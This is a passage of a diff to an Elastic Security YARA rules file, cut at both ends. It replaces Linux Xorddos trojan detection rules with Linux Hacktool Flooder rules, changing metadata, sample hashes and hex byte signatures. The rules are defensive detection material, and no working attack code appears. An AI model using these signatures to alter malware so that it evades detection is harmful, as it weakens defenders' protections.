Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "debb98a1-c861-4458-8bff-fae4f00a17dc" - date = "2022-09-12" - modified = "2022-10-18" + id = "7026f674-83b7-432b-9197-2d71abdb9579" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L157-L175" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "494f549e3dd144e8bcb230dd7b3faa8ff5107d86d9548b21b619a0318e362cad" - logic_hash = "c2e43818fcf18d34a6a3611aaaafde31d96b41867d15dfdb1dec20203f5907eb" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b7a77ebb66664c54d01a57abed5bb034ef2933a9590b595bba0566938b099438" + logic_hash = "ec8ece1f922260f620fb30d82469f77a4d0239da536fc464fc37a3943cd6e463" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2c5688a82f7d39b0fceaf4458856549b1bce695a160a864f41b12b42e86e3745" + fingerprint = "acf93628ecbda544c6c5d88388ac85bb2755c71544a0980ee1b2854c6bdb7c77" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -65013,28 +65912,28 @@ rule ELASTIC_Linux_Trojan_Xorddos_Debb98A1 : FILE MEMORY os = "linux" strings: - $a = { F4 87 5D F4 5B 9C 51 8B 4C 24 04 8D 49 2A 87 4C 24 04 89 4C } + $a = { 08 1E 77 DA 00 43 6F 75 6C 64 20 6E 6F 74 20 6F 70 65 6E 20 } condition: all of them } -rule ELASTIC_Linux_Trojan_Xorddos_1D6E10Fd : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_761Ad88E : FILE MEMORY { meta: - description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "1d6e10fd-7404-4597-a97d-cc92849d84f4" - date = "2022-09-12" - modified = "2022-10-18" + id = "761ad88e-1667-4253-81f6-52c92e0ccd68" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L177-L195" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4c7851316f01ae84ee64165be3ba910ab9b415d7f0e2f5b7e5c5a0eaefa3c287" - logic_hash = "01ec1af1ca03173e867113c3bec7911990a0c8c2d9f19b5233715a7f7490f5f1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L61-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1d88971f342e4bc4e6615e42080a3b6cec9f84912aa273c36fc46aaf86ff6771" + logic_hash = "2b0c64da713e2f8ff671cbe086638810bc02a983d42851e78c68a57bde9f023c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "bf9d971a13983f1d0fdc8277e76cd1929523e239ce961316fe1f44cbdf0638a8" + fingerprint = "14e701abdef422dcde869a2278ec6e1fb7889dcd9681a224b29a00bcb365e391" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -65042,28 +65941,27 @@ rule ELASTIC_Linux_Trojan_Xorddos_1D6E10Fd : FILE MEMORY os = "linux" strings: - $a = { 24 04 9C 83 C5 7B 9D 8D 6D 85 87 54 24 00 9C 83 C5 26 9D 8D } + $a = { 2E 31 36 38 2E 33 2E 31 30 30 00 43 6F 75 6C 64 20 6E 6F 74 } condition: all of them } -rule ELASTIC_Linux_Trojan_Xorddos_E3Ffbbcc : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_B93655D3 : FILE MEMORY { meta: - description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "e3ffbbcc-7751-4d96-abec-22dd9618cab1" - date = "2022-09-12" - modified = "2022-10-18" + id = "b93655d3-1d3f-42f4-a47f-a69624e90da5" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L197-L215" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "28b7ddf2548411910af033b41982cdc74efd8a6ef059a54fda1b6cbd59faa8f6" - logic_hash = "54711c2d3e6d73cf4358ba4a65cb19d996adcfa905c0089a18a61fe841fe9a34" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L81-L98" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "34cb06385543c6c2c562f757df2f641d8402e7c9f95fa924e17652a1c38d695f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "d5d5117a31da1a0ac3ef4043092eed47e2844938da9d03e2b68a66658e300175" + fingerprint = "55119467cb5f9789b74064e63c1e7d905457b54f6e4da1a83c498313d6c90b5b" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -65071,28 +65969,28 @@ rule ELASTIC_Linux_Trojan_Xorddos_E3Ffbbcc : FILE MEMORY os = "linux" strings: - $a = { FF 10 52 FB FF D0 52 FB FF 00 52 FB FF D0 52 FB FF F0 51 FB } + $a = { C0 49 89 C5 74 45 45 85 F6 7E 28 48 89 C3 41 8D 46 FF 4D 8D 64 } condition: all of them } -rule ELASTIC_Linux_Trojan_Xorddos_30F3B4D4 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_Af9F75E6 : FILE MEMORY { meta: - description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "30f3b4d4-e634-418e-a9d5-7f12ef22f9ac" - date = "2022-09-12" - modified = "2022-10-18" + id = "af9f75e6-9a9b-4e03-9c76-8c0c9f07c8b1" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L217-L235" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5b15d43d3535965ec9b84334cf9def0e8c3d064ffc022f6890320cd6045175bc" - logic_hash = "99efc257ff2afb779304451bd9f6f6ce9e88f54954189601ed10e95e2268dd4f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L100-L118" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "bf6f3ffaf94444a09b69cbd4c8c0224d7eb98eb41514bdc3f58c1fb90ac0e705" + logic_hash = "b74f5fad3c7219038e51eb4fa12fb9d55d7f65a9f4bab0adff8609fabb0afdab" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "de1002eb8e9aae984ee5fe2a6c1f91845dab4861e09e01d644248cff8c590e5b" + fingerprint = "f6e7d6e9c03c8ce3e14b214fe268e7aab2e15c1b4378fe253021497fb9a884e6" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -65100,28 +65998,28 @@ rule ELASTIC_Linux_Trojan_Xorddos_30F3B4D4 : FILE MEMORY os = "linux" strings: - $a = { 24 70 9C 83 C5 17 9D 8D 6D E9 0F 10 74 24 60 8B F6 0F 10 6C } + $a = { C4 48 89 E0 48 83 C0 07 48 C1 E8 03 48 C1 E0 03 48 89 45 C0 C7 45 B4 14 00 } condition: all of them } -rule ELASTIC_Linux_Trojan_Xorddos_Ca75589C : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_1Bf0E994 : FILE MEMORY { meta: - description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "ca75589c-6354-411b-b0a5-8400e657f956" - date = "2022-09-12" - modified = "2022-10-18" + id = "1bf0e994-2648-4dbb-9b9c-b86b9a347700" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L237-L255" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0448c1b2c7c738404ba11ff4b38cdc8f865ccf1e202f6711345da53ce46e7e16" - logic_hash = "c717e6f85a5b30514803ba43c85d82e2aaa4533b7f74db5345df83d1cc4c6551" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L120-L138" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1ea2dc13eec0d7a8ec20307f5afac8e9344d827a6037bb96a54ad7b12f65b59c" + logic_hash = "2c1099b8078ac306f7cb67be5b5b5e34f57414b9aa26bdd6c26d3636c80846cd" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0bcaeae9ec0f5de241a05c77aadb5c3f2e39c84d03236971a0640ebae528a496" + fingerprint = "1f844c349b47dd49a75d50e43b6664e9d2b95c362efb730448934788b6bddb79" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -65129,28 +66027,28 @@ rule ELASTIC_Linux_Trojan_Xorddos_Ca75589C : FILE MEMORY os = "linux" strings: - $a = { 6D E0 25 01 00 00 00 55 8B EC C9 87 D1 87 0C 24 87 D1 8D 64 } + $a = { 05 88 10 48 8B 45 B8 0F B6 10 83 E2 0F 83 CA 40 88 10 48 8B } condition: all of them } -rule ELASTIC_Linux_Trojan_Xorddos_7909Cdd2 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_D710A5Da : FILE MEMORY { meta: - description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "7909cdd2-8a49-4f51-ae16-1ffe321a29d4" - date = "2022-09-12" - modified = "2022-10-18" + id = "d710a5da-26bf-4f6a-bf51-9cdac1f83aa3" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L257-L275" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0a4a5874f43adbe71da88dc0ef124f1bf2f4e70d0b1b5461b2788587445f79d9" - logic_hash = "4b2557ab78d22ae4f46e5813ba5dc4663cd92b945a1add3155f77d3030ccc92d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L140-L158" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ba895a9c449bf9bf6c092df88b6d862a3e8ed4079ef795e5520cb163a45bcdb4" + logic_hash = "118a29cc0ccd191181dabc134de282ba134e041113faaa4d95e0aa201646438b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "5c982596276c8587a88bd910bb2e75a7f72ea7a57c401ffa387aced33f9ac2b9" + fingerprint = "e673aa8785c7076f4cced9f12b284a2927b762fe1066aba8d6a5ace775f3480c" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -65158,28 +66056,28 @@ rule ELASTIC_Linux_Trojan_Xorddos_7909Cdd2 : FILE MEMORY os = "linux" strings: - $a = { A5 07 00 EC C5 19 08 EC C5 19 08 18 06 00 00 18 06 00 00 06 } + $a = { 74 24 48 8B 45 E0 48 83 C0 10 48 8B 08 48 8B 45 E0 48 83 C0 08 48 } condition: all of them } -rule ELASTIC_Linux_Trojan_Xorddos_2522D611 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_F434A3Fb : FILE MEMORY { meta: - description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "2522d611-4ce3-4583-87d6-e5631b62d562" - date = "2022-09-12" - modified = "2022-10-18" + id = "f434a3fb-e5fd-4749-8e53-fc6c80ee5406" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L277-L295" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0c2be53e298c285db8b028f563e97bf1cdced0c4564a34e740289b340db2aac1" - logic_hash = "59f2552809bc48e16719cb9b4d2a7b99999307803fce031ca39eb24e14b88908" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L160-L178" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ba895a9c449bf9bf6c092df88b6d862a3e8ed4079ef795e5520cb163a45bcdb4" + logic_hash = "11b173f73b87f50775be50c6b4528bd9b148ea4266297aec76ae126cab0facb0" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "985885a6b5f01e8816027f92148d2496a5535f3c15de151f05f69ec273291506" + fingerprint = "b74e55c56a063e14608f7e8f578cc3c74ec57954df39e63e49b60c0055725d51" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -65187,28 +66085,28 @@ rule ELASTIC_Linux_Trojan_Xorddos_2522D611 : FILE MEMORY os = "linux" strings: - $a = { 24 04 57 8B 7C 24 02 5F 87 44 24 00 50 8B 44 24 04 8D 40 42 87 44 } + $a = { C0 48 01 45 F8 48 83 45 E8 02 83 6D E4 01 83 7D E4 00 7F E3 48 8B } condition: all of them } -rule ELASTIC_Linux_Trojan_Xorddos_56Bd04D3 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_A2795A4C : FILE MEMORY { meta: - description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "56bd04d3-6b52-43f4-b170-637feb86397a" - date = "2022-09-12" - modified = "2022-10-18" + id = "a2795a4c-16c0-4237-a014-3570d1edb287" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L297-L315" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0d2ce3891851808fb36779a348a83bf4aa9de1a2b2684fd0692434682afac5ec" - logic_hash = "47a33fcd69dd78cbc6c3274aeaa8dddabe119ae65b59077e1807657b8a67fed3" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L180-L198" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9a564d6b29d2aaff960e6f84cd0ef4c701fefa2a62e2ea690106f3fdbabb0d71" + logic_hash = "18e15b8a417f9ff2fd9277a01eb3224c761807ce9541ece568f4525ae66eb81f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "25cd85e8e65362a993a314f2fc500266fce2f343d21a2e91b146dafbbe8186db" + fingerprint = "7c8bf248b159f3a140f10cd40d182fa84f334555b92306e6f44e746711b184cc" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -65216,28 +66114,28 @@ rule ELASTIC_Linux_Trojan_Xorddos_56Bd04D3 : FILE MEMORY os = "linux" strings: - $a = { 5C 87 5C 24 04 89 5C 24 04 8B 1C 24 8D 64 24 04 8B 00 8B F6 87 } + $a = { 48 8B 45 D8 66 89 50 04 48 8B 45 D8 0F B7 40 02 66 D1 E8 0F } condition: all of them } -rule ELASTIC_Linux_Trojan_Xorddos_F412E4B4 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_678C1145 : FILE MEMORY { meta: - description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "f412e4b4-adec-4011-b4b5-f5bb77b65d84" - date = "2022-09-12" - modified = "2022-10-18" + id = "678c1145-cc41-4e83-bc88-30f64da46dd3" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L317-L335" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0e3a3f7973f747fcb23c72289116659c7f158c604d937d6ca7302fbab71851e9" - logic_hash = "b4e1b193e80aa88b91255df3a5f2e45de7f23fdba4a28d3ceb12db63098e70e5" - score = 75 - quality = 75 + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L200-L218" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "559793b9cb5340478f76aaf5f81c8dbfbcfa826657713d5257dac3c496b243a6" + logic_hash = "5ff15c8d92bca62700bbb67aeebc41fd603687dbc0c93733955bf59375df40a1" + score = 60 + quality = 45 tags = "FILE, MEMORY" - fingerprint = "deb9f80d032c4b3c591935c474523fd6912d7bd2c4f498ec772991504720e683" + fingerprint = "f4f66668b45f520bc107b7f671f8c7f42073d7ff28863e846a74fbd6cac03e87" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -65245,28 +66143,28 @@ rule ELASTIC_Linux_Trojan_Xorddos_F412E4B4 : FILE MEMORY os = "linux" strings: - $a = { 24 04 C1 E2 05 8B C0 03 C2 9C 83 C5 0F 9D 8D 6D F1 05 0C 00 } + $a = { C8 48 BA AB AA AA AA AA AA AA AA 48 89 C8 48 F7 E2 48 C1 EA 05 48 } condition: all of them } -rule ELASTIC_Linux_Trojan_Xorddos_71F8E26C : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_3Cbdfb1F : FILE MEMORY { meta: - description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "71f8e26c-d0ff-49e8-9c20-8df9149e8843" - date = "2022-09-12" - modified = "2022-10-18" + id = "3cbdfb1f-6c66-48be-931e-3ae609c46ff4" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L337-L355" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "13f873f83b84a0d38eb3437102f174f24a0ad3c5a53b83f0ee51c62c29fb1465" - logic_hash = "f9f2f22acd4f52cc313e3ecf425604651e0b8c78e33480d4d05bae5b8c9661fb" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L220-L238" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "bd40ac964f3ad2011841c7eb4bf7cab332d4d95191122e830ab031dc9511c079" + logic_hash = "38e8ca59bf55c32b99aa76a89f60edcf09956b7cad0b4745fab92eca327c52db" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "dbd1275bd01fb08342e60cb0c20adaf42971ed6ee0f679fedec9bc6967ecc015" + fingerprint = "c7f5d7641ea6e780bc3045181c929be73621acfe6aec4d157f6a9e0334ba7fb9" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -65274,28 +66172,28 @@ rule ELASTIC_Linux_Trojan_Xorddos_71F8E26C : FILE MEMORY os = "linux" strings: - $a = { 24 8D 64 24 04 1B 07 87 DA 8B 5D F4 52 87 DA 5B 83 C2 03 52 8B 54 } + $a = { 5B 53 54 44 32 2E 43 20 42 59 20 53 54 41 43 4B 44 5D 20 53 } condition: all of them } -rule ELASTIC_Linux_Trojan_Xorddos_1A562D3B : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_8B63Ff02 : FILE MEMORY { meta: - description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "1a562d3b-bc59-4cb7-9ac1-7a4a79232869" - date = "2022-09-12" - modified = "2022-10-18" + id = "8b63ff02-be86-4c63-8f7b-4c70fbd8a83a" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L357-L375" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "15731db615b32c49c34f41fe84944eeaf2fc79dafaaa9ad6bf1b07d26482f055" - logic_hash = "8d3b369bdcecd675f99cedf26dba202256555be0f5feae612404f9b5e109fa93" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L240-L258" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a57de6cd3468f55b4bfded5f1eed610fdb2cbffbb584660ae000c20663d5b304" + logic_hash = "3b68353c8eeb21a3eba7a02ae76b66b4f094ec52d5309582544d247cc6548da3" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e052e99f15f5a0f704c04cae412cf4b1f01a8ee6e4ce880aedc79cf5aee9631a" + fingerprint = "af7a4df7e707c1b70fb2b29efe2492e6f77cdde5e8d1e6bfdf141acabc8759eb" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -65303,28 +66201,28 @@ rule ELASTIC_Linux_Trojan_Xorddos_1A562D3B : FILE MEMORY os = "linux" strings: - $a = { F0 87 1C 24 91 8D 64 24 FC 89 0C 24 8B C8 8B 04 24 87 D1 8D 64 } + $a = { DC 02 83 7D DC 01 0F 9F C0 84 C0 75 DF 83 7D DC 01 75 1D 66 C7 45 F6 } condition: all of them } -rule ELASTIC_Linux_Trojan_Xorddos_410256Ac : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_30973084 : FILE MEMORY { meta: - description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "410256ac-fc7d-47f1-b7b8-82f1ee9f2bfb" - date = "2022-09-12" - modified = "2022-10-18" + id = "30973084-60d2-494d-a3c6-2a015a9459a0" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L377-L395" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "15f44e10ece90dec1a6104d5be1effefa17614d9f0cfb2784305dab85367b741" - logic_hash = "88227af6d2f365b761961bdf4b94bed81bca79e23d546e69900faa17c3e4dc71" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L260-L278" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a22ffa748bcaaed801f48f38b26a9cfdd5e62183a9f6f31c8a1d4a8443bf62a4" + logic_hash = "d965a032c0fb6020c6187aa3117f7251dd8c9287c45453e3d5ae2ac62b3067bb" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "aa7f1d915e55c3ef178565ed12668ddd71bf3e982dba1f2436c98cceef2c376d" + fingerprint = "44fc236199ccf53107f1a617ac872f51d58a99ec242fe97b913e55b3ec9638e2" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -65332,28 +66230,28 @@ rule ELASTIC_Linux_Trojan_Xorddos_410256Ac : FILE MEMORY os = "linux" strings: - $a = { 24 04 87 CA 8B 4D 0C 52 87 CA 59 03 D1 55 8B EC C9 6A 08 F7 } + $a = { 4C 69 73 74 20 49 6D 70 6F 72 74 20 46 6F 72 20 53 6F 75 72 63 } condition: all of them } -rule ELASTIC_Linux_Trojan_Xorddos_93Fa87F1 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_1Cfa95Dd : FILE MEMORY { meta: - description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "93fa87f1-ec9d-4b3b-9c9a-a0b80963f41f" - date = "2022-09-12" - modified = "2022-10-18" + id = "1cfa95dd-e768-4071-9038-389c580741f9" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L397-L415" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "165b4a28fd6335d4e4dfefb6c40f41f16d8c7d9ab0941ccd23e36cda931f715e" - logic_hash = "2a1e797d4dd2599b5c67e73e3c909a1803e604edf0b6ba228713ee375ccc9b16" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L280-L298" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1d88971f342e4bc4e6615e42080a3b6cec9f84912aa273c36fc46aaf86ff6771" + logic_hash = "f73a96cc379c8dc060bfe5668ef7e47c5bcd037b3f41c300ef20c2f2f653cb00" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3b53e54dfea89258a116dcdf4dde0b6ad583aff08d626c02a6f1bf0c76164ac7" + fingerprint = "6ec21acb987464613830b3bbe1e2396093d269dae138c68fe77f35d88796001e" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -65361,28 +66259,28 @@ rule ELASTIC_Linux_Trojan_Xorddos_93Fa87F1 : FILE MEMORY os = "linux" strings: - $a = { 03 87 44 24 04 89 44 24 04 8B 04 24 8D 64 24 04 8B 00 9C 83 } + $a = { 83 7D EC 00 7E 0F 48 8B 45 F0 0F B6 00 0F B6 C0 48 01 C3 EB 10 } condition: all of them } -rule ELASTIC_Linux_Trojan_Xorddos_8677Dca3 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_25C48456 : FILE MEMORY { meta: - description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "8677dca3-e36b-439f-bc55-76d951114020" - date = "2022-09-12" - modified = "2022-10-18" + id = 